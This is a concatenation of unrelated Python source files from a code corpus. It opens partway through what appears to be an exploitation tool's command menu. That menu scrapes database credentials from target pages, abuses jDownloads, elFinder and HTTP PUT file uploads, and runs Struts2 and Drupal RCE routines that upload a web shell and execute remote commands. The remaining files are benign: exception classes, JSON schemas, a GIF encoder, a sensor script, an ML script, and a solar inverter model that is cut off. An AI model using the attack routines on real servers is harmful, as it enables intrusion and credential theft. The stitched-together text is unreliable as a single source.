user = re.findall("user = '(.*)';",r.text)
pw = re.findall("password = '(.*)';",r.text)
db = re.findall("db = '(.*)';",r.text)
for i in [host,user,pw,db]:
log.log(10,f'{i}')
else:
log.log(30,'not vulnerability')
elif inp == jom[3]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_jdownloads(input('Email: '))
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == oth[0]:
url = proto(input(T))
f = input(F)
n = input(N)
r = requests.put(
f'{url}/n',
data = open(f,'r').read(),
headers = {
'Content-Type':'application/octet-stream'
}
)
rr = requests.get(f'{url}/n')
upload_debug(r,rr)
elif inp == oth[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).elfinder
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=None)
upload_debug(x.post(),x.get_check())
elif inp == oth[2]:
x = apache_struts2(proto(input(T)))
log.log(10,'checking vulnerability')
if x.check() == 'vuln':
log.log(50,'vulnerability')
x.execute_shell()
else:
log.log(30,f'not vulnerability')
elif inp == oth[3]:
x = drupal_rce(proto(input(T)))
log.log(10,'checking version..')
ver = x.version()
if ver == '8':
log.log(10,'detecting version 8')
log.log(10,'testing vulnerability....')
log.log(10,'uploading shell...')
p = x.upload_shell(ver)
log.log(10,f'status: {p.status_code}')
x.check_shell()
if x.path_shell == '':
log.log(30,'not vulnerability')
else:
log.log(50,'target vulnerability')
log.log(10,'starting remote command execution..')
x.execute_shell(x.path_shell)
else:
log.log(40,'the target does not use drupal webapp')
elif inp == oth[4]:
x = drupal_rce(proto(input(T)))
log.log(10,'checking version..')
ver = x.version()
if ver == '7':
log.log(10,'detecting version 7')
log.log(10,'testing vulnerability....')
log.log(10,'uploading shell...')
p = x.upload_shell(ver)
log.log(10,f'status: {p.status_code}')
x.check_shell()
if x.path_shell == '':
log.log(30,'not vulnerability')
else:
log.log(50,'target vulnerability')
log.log(10,'starting remote command execution..')
x.execute_shell(x.path_shell)
else:
log.log(40,'the target does not use drupal webapp')
elif inp == oth[5]:
url = proto(input(T))
x = dvr(url)
log.log(10,'getting config....')
p = x.request_get()
if p == 'not vuln':
log.log(30,'target not vulnerability')
else:
json_respon(p)
elif inp == 'back':
break
elif inp == 'exit':
exit()
elif inp == 'help':
show(sss,description['exploit'])
else:
print(f'\033[91m!\033[0m no command {inp}')
except Exception as e:
print(e)
except KeyboardInterrupt:
exit()
| StarcoderdataPython |
316588 | class EventNotFound(Exception):
"""Handles invalid event type provided to
publishers
Attributes:
event_type --> the event that's invalid
message --> additional message to log or print
"""
def __init__(self, event_type: str, message: str ="invalid event"):
self.event_type = event_type
self.message = message
def __repr__(self):
return f"{self.event_type} --> {self.message}"
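# Usage sketch (the event name below is illustrative, not part of this module):
# raise EventNotFound("user_created", "no publisher registered for this event")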
class UnexpectedError(Exception):
"""Handles unknown errors
Attributes:
message --> additional message to log or print
"""
def __init__(self, message: str ="unexpected error occured"):
self.message = message
def __repr__(self):
        return f"{self.message}"
class NotFoundError(Exception):
"""Handles not found
Attributes:
message --> additional message to log or print
"""
def __init__(self, message: str ="element not found"):
self.message = message
def __repr__(self):
        return f"{self.message}" | StarcoderdataPython |
3295723 | #-------------------------------
print("FUNCTION BINARYSTRING")
import FunctionBinaryString.Convert
import FunctionBinaryString.Decode
import FunctionBinaryString.Encode
import FunctionBinaryString.GetByte
import FunctionBinaryString.Length
import FunctionBinaryString.Md5
import FunctionBinaryString.SetByte
import FunctionBinaryString.Sha256
import FunctionBinaryString.Substr
import FunctionBinaryString.Substring
import FunctionBinaryString.Trim
#-------------------------------
print("FUNCTION MATHEMATIC")
import FunctionMathematical.Abs
#import FunctionMathematical.Cbrt
import FunctionMathematical.Ceil
import FunctionMathematical.Ceiling
import FunctionMathematical.Degrees
import FunctionMathematical.Factorial
import FunctionMathematical.Floor
import FunctionMathematical.Gcd
#import FunctionMathematical.Lcm
#import FunctionMathematical.Ln
import FunctionMathematical.Log
import FunctionMathematical.Log10
#import FunctionMathematical.MinScale
import FunctionMathematical.Mod
import FunctionMathematical.PI
import FunctionMathematical.Power
import FunctionMathematical.Radians
import FunctionMathematical.Random
import FunctionMathematical.Round
import FunctionMathematical.Scale
#import FunctionMathematical.SetSeed
#import FunctionMathematical.Sign
import FunctionMathematical.Sqrt
#import FunctionMathematical.TrimScale
import FunctionMathematical.Trunc
#import FunctionMathematical.WidthBucket
#-------------------------------
print("FUNCTION TRIGONOMETRIC")
import FunctionTrigonometric.Acos
import FunctionTrigonometric.Acosh
import FunctionTrigonometric.Asin
import FunctionTrigonometric.Asinh
import FunctionTrigonometric.Atan
import FunctionTrigonometric.Atan2
import FunctionTrigonometric.Atanh
import FunctionTrigonometric.Cos
import FunctionTrigonometric.Cosh
import FunctionTrigonometric.Cot
import FunctionTrigonometric.Sin
import FunctionTrigonometric.Sinh
import FunctionTrigonometric.Tan
import FunctionTrigonometric.Tanh
print("hola") | StarcoderdataPython |
6622886 | #!/usr/bin/env python
import unittest
from journals.databases.icat.sns.interface import SnsICatInterface
if __name__=="__main__":
conn = SnsICatInterface()
#print(conn.get_instruments())
print(conn.get_experiments('NOM'))
#print(conn.get_experiments_meta('NOM'))
#print(conn.get_experiments_id_and_title('NOM'))
#print(conn.get_experiments_id_and_date('NOM'))
#print(conn.get_runs_all('NOM','IPTS-17210'))
#print(conn.get_runs('NOM','IPTS-17210'))
#print(conn.get_runs_meta('NOM','IPTS-17210'))
#print(conn.get_run_number_and_title('NOM','IPTS-17210'))
#print(conn.get_user_experiments('ntm'))
#print(conn.get_runs_meta('NOM', 'IPTS-8814'))
| StarcoderdataPython |
8186460 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
USER = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"username": {
"type": "string",
"minLength": 2,
"maxLength": 32
},
"password": {
"type": "string",
"minLength": 8,
"maxLength": 32
},
"is_admin": {
"type": "boolean"
},
"is_superadmin": {
"type": "boolean"
},
"is_active": {
"type": "boolean"
}
}
}
ICON = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"url": {
"type": "string",
"minLength": 9,
"maxLength": 512
},
"approved": {
"type": "boolean"
}
}
}
SECTION = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
SUBSECTION = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"section": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
CATEGORY = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"subsection": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
SMILE = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"url": {
"type": "string",
"minLength": 9,
"maxLength": 512
},
"w": {
"type": "integer",
"minimum": 1
},
"h": {
"type": "integer",
"minimum": 1
},
"category": {
"type": ["integer", "null"]
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
},
"tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"add_tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"remove_tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"approved": {
"type": "boolean"
},
"hidden": {
"type": "boolean"
}
}
}
SMILEPACK = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 0,
"maxLength": 64
},
"fork": {
"type": ["string", "null"]
},
"edit": {
"type": ["string", "null"]
},
"categories": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 0,
"maxLength": 128
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
},
"icon": {
"type": "integer"
}
},
"required": ["icon"]
}
},
"smiles": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "integer"
},
"category": {
"type": "integer",
"mininum": 0
},
"w": {
"type": "integer",
"minimum": 1
},
"h": {
"type": "integer",
"minimum": 1
}
},
"required": ["category", "id"],
}
},
"lifetime": {
"type": "integer"
},
"icon": {
"type": "integer"
},
},
"required": ["categories", "smiles"]
}
USERSCRIPT_COMPAT = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "array",
"items": {
"type": "object",
"properties": {
"categories": {
"type": "array",
"items": {
"properties": {
"iconId": {
"type": "integer"
},
"smiles": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": ["string", "integer"]
},
"w": {
"type": "integer"
},
"h": {
"type": "integer"
},
"url": {
"type": "string"
}
},
"oneOf": [
{"required": ["w", "h"]}
]
}
}
},
"required": ["smiles"]
},
}
},
"required": ["categories"]
}
}
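# Validation sketch (assumes the third-party `jsonschema` package is available;
# the payload values are illustrative only):
# import jsonschema
# jsonschema.validate({"username": "alice", "password": "longenough1"}, USER)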
| StarcoderdataPython |
3524184 | <gh_stars>1-10
from machine import Pin
import machine
import time
#utime is an library used for getting the current time and date
#measuring time intervals, and for delays
import utime
#set the input to trigger module to send ultrasonic waves
#the trigger pin (transmitter) must be set as OUTPUT
trig_pin = Pin(0, Pin.OUT)#D3
#set he output received representing the reflection of waves
#the echo pin (receiver) must be set as INPUT
echo_pin = Pin(14, Pin.IN)#D5
while True:
#set the trigPin to LOW(0) in order to prepare for the next reading
trig_pin.value(0)
#delay for 2 microseconds
utime.sleep_us(2)
#generate an ultrasound for 10 microseconds then turn off the transmitter
trig_pin.value(1)
utime.sleep_us(10)
    trig_pin.value(0)
#find the time using machine.time_pulse_us(pin, pulse_level, timeout_us=1000000)
    #Time a pulse on the given pin, and return the duration of the pulse in microseconds
    #an optional timeout (e.g. 29000) sets how many microseconds to wait for the pulse to begin
    #use a name other than `time` so the imported time module is not shadowed
    duration = machine.time_pulse_us(echo_pin, 1)
    #the formula for distance d = t*v/2
    #v represents the speed of sound in air (about 0.034 cm/μs)
    #t is the duration of the echo pulse
    distance = (duration * 0.034) / 2
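    # worked example: a 1000 us echo pulse gives (1000 * 0.034) / 2 = 17.0 cm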
print("The distance is {} cm".format(distance)) | StarcoderdataPython |
4991478 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-21 07:19
from __future__ import unicode_literals
import PeopleApp.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('PeopleApp', '0007_batch_undergraduatestudents'),
]
operations = [
migrations.CreateModel(
name='MscStudents',
fields=[
('rollno', models.CharField(max_length=12, primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('email', models.CharField(max_length=50, unique=True)),
('profile_picture', models.ImageField(blank=True, null=True, upload_to=PeopleApp.models.get_image_path)),
('batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PeopleApp.Batch')),
],
),
migrations.AlterField(
model_name='undergraduatestudents',
name='name',
field=models.CharField(max_length=100),
),
]
| StarcoderdataPython |
11240574 | # -*- coding: utf-8 -*-
"""
~~~~~~~~~~~~~~~~~~~~
A simple GIF encoder
~~~~~~~~~~~~~~~~~~~~
Structure of a GIF file: (in the order they appear)
1. always begins with the logical screen descriptor.
2. then follows the global color table.
3. then follows the loop control block (specify the number of loops).
4. then follows the image data of the frames,
each frame is further divided into:
(i) a graphics control block that specify the delay and
transparent color of this frame.
(ii) the image descriptor.
(iii) the LZW encoded data.
    5. finally the trailer '0x3B'.
Reference for the GIF89a specification:
http://giflib.sourceforge.net/whatsinagif/index.html
"""
from struct import pack
class DataBlock(object):
"""
Write bits into a bytearray and then pack this bytearray into data blocks.
This class is used in the Lempel-Ziv-Welch compression algorithm when
encoding maze into frames.
"""
def __init__(self):
self._bitstream = bytearray() # write bits into this array
self._nbits = 0 # a counter holds how many bits have been written
def encode_bits(self, num, size):
"""
Given a number `num`, encode it as a binary string of length `size`,
and pack it at the end of bitstream.
Example: num = 3, size = 5. The binary string for 3 is '00011' (it's
'0b00011' in python), here we padded extra zeros at the left to make
its length to be 5. The tricky part is that in a gif file, the encoded
binary data stream increases from lower (least significant) bits to higher
(most significant) bits, so we have to reverse it as '11000' and pack
this string at the end of bitstream!
"""
string = bin(num)[2:].zfill(size)
for digit in reversed(string):
if len(self._bitstream) * 8 == self._nbits:
self._bitstream.append(0)
if digit == '1':
self._bitstream[-1] |= 1 << self._nbits % 8
self._nbits += 1
def dump_bytes(self):
"""
Pack the LZW encoded image data into blocks.
Each block is of length <= 255 and is preceded by a byte
in 0-255 that indicates the length of this block.
Each time after this function is called `_nbits` and
`_bitstream` are reset to 0 and empty.
"""
bytestream = bytearray()
while len(self._bitstream) > 255:
bytestream.append(255)
bytestream.extend(self._bitstream[:255])
self._bitstream = self._bitstream[255:]
if len(self._bitstream) > 0:
bytestream.append(len(self._bitstream))
bytestream.extend(self._bitstream)
self._nbits = 0
self._bitstream = bytearray()
return bytestream
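# Worked illustration of the packing above (values computed by hand, not taken
# from the original module): encode_bits(3, 5) appends the reversed bit string
# '11000', so the first byte of the stream is 0b00000011; dump_bytes() then
# yields the length byte 1 followed by that data byte.
# block = DataBlock()
# block.encode_bits(3, 5)
# block.dump_bytes()  # bytearray(b'\x01\x03')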
class Compression(object):
"""
The Lempel-Ziv-Welch compression algorithm used by the GIF89a specification.
"""
def __init__(self, min_code_length):
"""
min_code_length: an integer between 2 and 12.
GIF allows the minimum code length as small as 2 and as large as 12.
Even there are only two colors, the minimum code length must be at least 2.
Note this is not actually the smallest code length that is used
in the encoding process since the minimum code length tells us
how many bits are needed just for the different colors of the image,
we still have to account for the two special codes `end` and `clear`.
Therefore the actual smallest code length that will be used is one more
than `min_code_length`.
"""
if not isinstance(min_code_length, int) \
and not 2 <= min_code_length <= 12:
raise ValueError('Invalid minimum code length.')
self._stream = DataBlock()
self._min_code_length = min_code_length
self._clear_code = 1 << min_code_length
self._end_code = self._clear_code + 1
self._max_codes = 4096
def __call__(self, input_data):
"""
input_data: a 1-d list consists of integers in range [0, 255],
these integers are the indices of the colors of the pixels
in the global color table.
We do not check the validity of the input data here for efficiency.
"""
# this is actually the minimum code length used
code_length = self._min_code_length + 1
next_code = self._end_code + 1
# the default initial dict
code_table = {(i,): i for i in range(1 << self._min_code_length)}
# output the clear code
self._stream.encode_bits(self._clear_code, code_length)
pattern = tuple()
for c in input_data:
pattern += (c,)
if pattern not in code_table:
# add new code to the table
code_table[pattern] = next_code
# output the prefix
self._stream.encode_bits(code_table[pattern[:-1]], code_length)
pattern = (c,) # suffix becomes the current pattern
next_code += 1
if next_code == 2**code_length + 1:
code_length += 1
if next_code == self._max_codes:
next_code = self._end_code + 1
self._stream.encode_bits(self._clear_code, code_length)
code_length = self._min_code_length + 1
code_table = {(i,): i for i in range(1 << self._min_code_length)}
self._stream.encode_bits(code_table[pattern], code_length)
self._stream.encode_bits(self._end_code, code_length)
return bytearray([self._min_code_length]) + self._stream.dump_bytes() + bytearray([0])
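# Usage sketch for the LZW encoder above (the index list is made up; a real call
# would pass the flattened palette indices of one frame):
# lzw = Compression(min_code_length=2)
# encoded = lzw([0, 1, 1, 2, 2, 2, 3])  # ready to follow an image descriptor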
def screen_descriptor(width, height, color_depth):
"""
This block specifies both the size of the image and its global color table.
"""
byte = 0b10000000 | (color_depth - 1) | (color_depth - 1) << 4
return pack('<6s2H3B', b'GIF89a', width, height, byte, 0, 0)
def loop_control_block(loop):
"""
This block specifies the number of loops (0 means loop infinitely).
"""
return pack('<3B8s3s2BHB', 0x21, 0xFF, 11, b'NETSCAPE', b'2.0', 3, 1, loop, 0)
def graphics_control_block(delay, trans_index=None):
"""
This block specifies the delay and transparent color of the coming frame.
`trans_index=None` means no transparent color.
For static frames this block is not added.
"""
if trans_index is None:
return pack("<4BH2B", 0x21, 0xF9, 4, 0b00000100, delay, 0, 0)
else:
return pack("<4BH2B", 0x21, 0xF9, 4, 0b00000101, delay, trans_index, 0)
def image_descriptor(left, top, width, height, byte=0):
"""
This block specifies the position of the coming frame (relative to the window)
and whether it has a local color table or not.
"""
return pack('<B4HB', 0x2C, left, top, width, height, byte)
def global_color_table(color_depth, palette):
"""
Return a valid global color table.
The global color table of a GIF image is a 1-d bytearray of the form
[r1, g1, b1, r2, g2, b2, ...] with length equals to 2**n where n is
the color depth of the image.
----------
Parameters
color_depth: color depth of the GIF.
palette: a list of rgb colors of the format [r1, g1, b1, r2, g2, b2, ...].
The number of colors must be greater than or equal to 2**n where n is
the color depth. Redundant colors will be discarded.
"""
try:
palette = bytearray(palette)
except:
raise ValueError('Cannot convert palette to bytearray.')
valid_length = 3 * (1 << color_depth)
if len(palette) < valid_length:
raise ValueError('Invalid palette length.')
if len(palette) > valid_length:
palette = palette[:valid_length]
return palette
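# How the helpers above fit together for a minimal one-frame GIF (illustrative
# sketch; the 4x4 size, 2-bit depth, palette and pixel indices are assumptions):
# width, height, depth = 4, 4, 2
# palette = global_color_table(depth, [0, 0, 0, 255, 255, 255] * 2)
# pixels = [0, 1] * 8  # flattened palette indices, row by row
# data = screen_descriptor(width, height, depth) + palette
# data += image_descriptor(0, 0, width, height)
# data += Compression(depth)(pixels)
# data += bytearray([0x3B])  # trailer
# with open('tiny.gif', 'wb') as f:
#     f.write(data)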
| StarcoderdataPython |
6477731 | <reponame>scottza/PyTOPKAPI
import datetime as dt
from configparser import SafeConfigParser
import h5py
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.dates import date2num
import pytopkapi.utils as ut
def run(ini_file='plot_Qsim_Qobs_Rain.ini'):
config = SafeConfigParser()
config.read(ini_file)
print('Read the file ',ini_file)
file_Qsim=config.get('files','file_Qsim')
file_Qobs=config.get('files','file_Qobs')
file_rain=config.get('files','file_rain')
image_out=config.get('files','image_out')
group_name=config.get('groups','group_name')
Qobs=config.getboolean('flags','Qobs')
Pobs=config.getboolean('flags','Pobs')
nash=config.getboolean('flags','nash')
tab_col=['k','r']
tab_style=['-','-']
tab_width=['1','1']
color_P='b'
transparency_P=0.5#(0 for invisible)
#create path_out if it does'nt exist
ut.check_file_exist(image_out)
#Read the obs
#Qobs
ar_date, ar_Qobs = read_observed_flow(file_Qobs)
delta = date2num(ar_date[1]) - date2num(ar_date[0])
#Rain
if Pobs:
h5file = h5py.File(file_rain)
dset_string = '/%s/rainfall' % group_name
ndar_rain = h5file[dset_string][...]
h5file.close()
#Compute the mean catchment rainfall
ar_rain=np.average(ndar_rain,axis=1)
#Read the simulated data Q
file_h5=file_Qsim
ndar_Qc_out=ut.read_one_array_hdf(file_h5,'Channel','Qc_out')
ar_Qsim=ndar_Qc_out[1:,0]
##Graph
fig, ax = plt.subplots()
lines = []
tab_leg = []
if Qobs:
lines += ax.plot(ar_date, ar_Qobs,
color=tab_col[-1],
linestyle=tab_style[-1], linewidth=tab_width[-1])
tab_leg.append(('Observation'))
tab_leg = tab_leg[::-1]
lines += ax.plot(ar_date, ar_Qsim,
color=tab_col[0],
linestyle=tab_style[0], linewidth=tab_width[0])
tab_leg.append('Model')
if nash:
nash_value = ut.Nash(ar_Qsim,ar_Qobs)
lines += ax.plot(ar_date[0:1], ar_Qsim[0:1], 'w:')
tab_leg.append(('Eff = '+str(nash_value)[0:5]))
ax.set_xlim(ar_date[0], ar_date[-1])
ytitle=r'$Q \ (m^3/s)$'
ax.set_ylabel(ytitle, fontsize=18)
ax.set_title(group_name)
ax2 = ax.twinx()
ax2.set_ylabel(r'$Rainfall \ (mm)$', fontsize=18, color=color_P)
ax2.bar(ar_date, ar_rain, width=delta,
facecolor='blue', edgecolor='blue', alpha=transparency_P)
ax2.set_ylim(max(ar_rain)*2, min(ar_rain))
ax2.legend(lines, tab_leg, loc='upper right', fancybox=True)
leg = ax2.get_legend()
leg.get_frame().set_alpha(0.75)
# rotate and align the tick labels so they look better,
# unfortunately autofmt_xdate doesn't work with twinx due to a bug
# in matplotlib <= 1.0.0 so we do it manually
## fig.autofmt_xdate()
bottom=0.2
rotation=30
ha='right'
for ax in fig.get_axes():
if hasattr(ax, 'is_last_row') and ax.is_last_row():
for label in ax.get_xticklabels():
label.set_ha(ha)
label.set_rotation(rotation)
else:
for label in ax.get_xticklabels():
label.set_visible(False)
ax.set_xlabel('')
fig.subplots_adjust(bottom=bottom)
fig.savefig(image_out)
plt.show()
def read_observed_flow(file_name):
"""Read the observed flow from a data file.
"""
date = np.loadtxt(file_name, dtype=np.int, usecols=(0, 1, 2, 3, 4))
dates = [dt.datetime(yr, mon, dy, hr, mn) for yr, mon, dy, hr, mn in date]
Q = np.loadtxt(file_name, usecols=(5,))
return dates, Q
| StarcoderdataPython |
8035170 | <gh_stars>0
class Solution:
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return sum(range(len(nums)+1)) - sum(nums) | StarcoderdataPython |
6619993 | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import OrdinalEncoder
from sklearn.metrics import roc_curve as ROC
import matplotlib.pyplot as plt
from sklearn.metrics import classification_report
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import recall_score
from sklearn.metrics import roc_auc_score
import warnings
warnings.filterwarnings("ignore")
def dataWash(city, path: str):
weather = pd.read_csv(path)
X = weather.iloc[:,:-1]
Y = weather.loc[:,("Location","RainTomorrow")]
X = X.loc[X.loc[:,"Location"] == city]
Y = Y.loc[Y.loc[:,"Location"] == city]
Y =Y.drop(['Location'], axis=1)
X =X.drop(['Location'], axis=1)
#get month
X["Date"] = X["Date"].apply(lambda x:int(x.split("/")[1]))
X = X.rename(columns={"Date":"Month"})
#fill Null object-data up with most frequent value
cate = X.columns[X.dtypes == "object"].tolist()
si = SimpleImputer(missing_values=np.nan,strategy="most_frequent")
si.fit(X.loc[:,cate])
X.loc[:,cate] = si.transform(X.loc[:,cate])
#encode object data
oe = OrdinalEncoder()
oe = oe.fit(X.loc[:,cate])
X.loc[:,cate] = oe.transform(X.loc[:,cate])
oe = oe.fit(Y.loc[:,:])
Y.loc[:,:] = oe.transform(Y.loc[:,:])
#fill float data up with mean value.
col = X.columns[X.dtypes == "float64"].tolist()
impmean = SimpleImputer(missing_values=np.nan,strategy = "mean")
impmean = impmean.fit(X.loc[:,col])
X.loc[:,col] = impmean.transform(X.loc[:,col])
return X, Y
def Solution(city, Xt, Yt):
Xtrain, Xtest, Ytrain, Ytest = train_test_split(Xt,Yt,test_size=0.3)
Xreal, Yreal = dataWash(city, '%s.csv' % (city))
print(Xreal)
print(Yreal)
for i in [Xtrain,Xtest,Ytrain,Ytest]:
i.index = range(i.shape[0])
clf = LogisticRegression()
clf.fit(Xtrain, Ytrain.values.ravel())
result = clf.predict(Xtest)
score = clf.score(Xtest,Ytest.values.ravel())
recall = recall_score(Ytest.values.ravel(), result)
auc = roc_auc_score(Ytest.values.ravel(),clf.decision_function(Xtest))
#print("LR's testing accuracy %f, recall is %f, auc is %f" % (score,recall,auc))
#print(clf.predict(Xreal))
#print(clf.score(Xtrain, Ytrain.values.ravel()))
'''
#draw ROC curve
FPR, Recall, thresholds = ROC(Ytest,clf.decision_function(Xtest),pos_label=1)
area = roc_auc_score(Ytest,clf.decision_function(Xtest))
plt.figure()
plt.plot(FPR, Recall, color='red',
label='ROC curve (area = %0.2f)' % area)
plt.plot([0, 1], [0, 1], color='black', linestyle='--')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('Recall')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
'''
#report
#print(classification_report(Ytest.values.ravel(), result))
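    # Example call sketch (city name and CSV filenames are assumptions; note that
    # Solution() also loads a separate '<city>.csv' for the held-out data):
    #   Xt, Yt = dataWash('Sydney', 'weatherAUS.csv')
    #   Solution('Sydney', Xt, Yt)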
| StarcoderdataPython |
8112927 | <gh_stars>10-100
"""Single phase constant Vdc PV-DER code."""
from __future__ import division
import numpy as np
import math
import cmath
import scipy
import six
import pdb
import warnings
from pvder.DER_components import SolarPVDER,PVModule
from pvder.grid_components import BaseValues
from pvder import utility_functions
from pvder import defaults,templates
from pvder.logutil import LogUtil
class SolarPVDERSinglePhaseConstantVdc(PVModule,SolarPVDER):
"""
Class for describing a Solar Photo-voltaic Distributed Energy Resource consisting of panel, converters, and
control systems.
Attributes:
count (int): Number of instances of `SolarPVDERSinglePhaseConstantVdc`.
n_ODE (int): Number of ODE's.
"""
count = 0
def __init__(self,events,configFile=None,**kwargs):
"""Creates an instance of `SolarPV_DER_SinglePhase`.
Args:
events (SimulationEvents): An instance of `SimulationEvents`.
gridModel (Grid): An instance of `Grid`(only need to be suppled for stand alone simulation).
powerRating (float): A scalar specifying the rated power (VA) of the DER.
VrmsRating (float): A scalar specifying the rated RMS L-G voltage (V) of the DER.
ia0,xa0,ua0 (complex): Initial value of inverter states in p.u. of the DER instance.
xP0,xQ0,xPLL0,wte0 (float): Initial value of inverter states in the DER instance.
            gridVoltagePhaseA: Initial voltage phasor (V) at PCC - LV side from external program (only needs to be supplied if model is not stand alone).
standAlone (bool): Specify if the DER instance is a stand alone simulation or part of a larger simulation.
steadyStateInitialization (bool): Specify whether states in the DER instance will be initialized to steady state values.
allowUnbalancedM (bool): Allow duty cycles to take on unbalanced values during initialization (default: False).
derConfig (dict): Configuration parameters that may be supplied from an external program.
identifier (str): An identifier that can be used to name the instance (default: None).
Raises:
ValueError: If parameters corresponding to `Sinverter_rated` are not available.
ValueError: If rated DC link voltage is not sufficient.
"""
try:
SolarPVDERSinglePhaseConstantVdc.count = SolarPVDERSinglePhaseConstantVdc.count+1 #Increment count to keep track of number of PV-DER model instances
DER_arguments = self.setup_DER(events,configFile,**kwargs)
if six.PY3:
super().__init__(self.DER_config['basic_options']['Sinsol'])#Initialize PV module class (base class)
elif six.PY2:
super(SolarPVDERSinglePhaseConstantVdc,self).__init__(self.DER_config['basic_options']['Sinsol'])
self.initialize_DER(DER_arguments)
self.creation_message()
except:
LogUtil.exception_handler()
@property#Decorator used for auto updating
def y0(self):
"""List of initial states"""
try:
return[self.ia.real, self.ia.imag, self.xa.real, self.xa.imag, self.ua.real,self.ua.imag,
self.xP,self.xQ,self.xPLL,self.wte]
except:
LogUtil.exception_handler()
#Apparent power output at inverter terminal
def S_calc(self):
"""Inverter apparent power output"""
try:
return (1/2)*(self.vta*self.ia.conjugate())*1.0
except:
LogUtil.exception_handler()
#Apparent power output at PCC - LV side
def S_PCC_calc(self):
"""Power output at PCC LV side"""
try:
return (1/2)*(self.va*self.ia.conjugate())
#return utility_functions.S_calc(self.va,self.vb,self.vc,self.ia,self.ib,self.ic)
except:
LogUtil.exception_handler()
def S_load1_calc(self):
"""Power absorbed by load at PCC LV side."""
return (1/2)*(self.va*(-(self.va/self.Zload1)).conjugate())
def S_G_calc(self):
"""Power absorbed/produced by grid voltage source."""
try:
return (1/2)*(-(self.ia-(self.va/self.Zload1))/self.a).conjugate()*self.grid_model.vag
except:
LogUtil.exception_handler()
#@property
def Vtrms_calc(self):
"""Inverter terminal voltage -RMS"""
try:
return utility_functions.Urms_calc(self.vta,self.vta,self.vta)
except:
LogUtil.exception_handler()
def Vrms_calc(self):
"""PCC LV side voltage - RMS"""
try:
return utility_functions.Urms_calc(self.va,self.va,self.va)
except:
LogUtil.exception_handler()
def Irms_calc(self):
"""Inverter current - RMS"""
return utility_functions.Urms_calc(self.ia,self.ia,self.ia)
def Vabrms_calc(self):
"""PCC LV side voltage - line to lineRMS"""
try:
return abs(self.va-self.vb)/math.sqrt(2)
except:
LogUtil.exception_handler()
def update_inverter_states(self,ia,xa,ua,xP,xQ,xPLL,wte):
"""Update inverter states
Args:
ia (complex): Inverter phase a current.
xa (complex): Inverter controller state.
ua (complex): Inverter controller state.
Vdc (float): DC link voltage.
"""
try:
self.ia = ia
self.xa = xa
self.ua = ua
self.xP = xP
self.xQ = xQ
self.xPLL = xPLL
self.wte = wte
except:
LogUtil.exception_handler()
def update_voltages(self):
"""Update voltages."""
try:
self.vta = self.vta_calc() #Update inverter terminal voltage
self.va = self.va_calc() #Update PCC LV side voltage
except:
LogUtil.exception_handler()
def update_RMS(self):
"""Update RMS voltages."""
try:
self.Vtrms = self.Vtrms_calc()
self.Vrms_min = self.Vrms = self.Vrms_calc()
self.Irms = self.Irms_calc()
#Update RMS values
if self.DO_EXTRA_CALCULATIONS:
pass
except:
LogUtil.exception_handler()
def update_power(self):
"""Update RMS voltages."""
try:
#Update power output
self.S = self.S_calc()
self.S_PCC = self.S_PCC_calc()
if self.standAlone:#Update load current and grid voltage source power only in stand alone mode
self.iaload1 = self.iphload1_calc(self.va)
self.S_G = self.S_G_calc()
self.S_load1 = self.S_load1_calc()
except:
LogUtil.exception_handler()
def update_Pref(self):
"""Update active power reference"""
try:
if not self.use_Pref:
self.Pref = self.Ppv
else:
raise ValueError('{}:User active power reference not implemented!')
except:
LogUtil.exception_handler()
def update_iref(self,t):
"""Update current reference"""
try:
if self.current_gradient_limiter:
self.ia_ref = self.get_ramp_limited_iref(t,self.ia_ref_activepower_control())
else:
self.ia_ref = self.ia_ref_activepower_control() #Get current controller setpoint
except:
LogUtil.exception_handler()
def update_inverter_frequency(self,t):
"""Update inverter PLL frequency.
Args:
t (float): Simulation time in seconds.
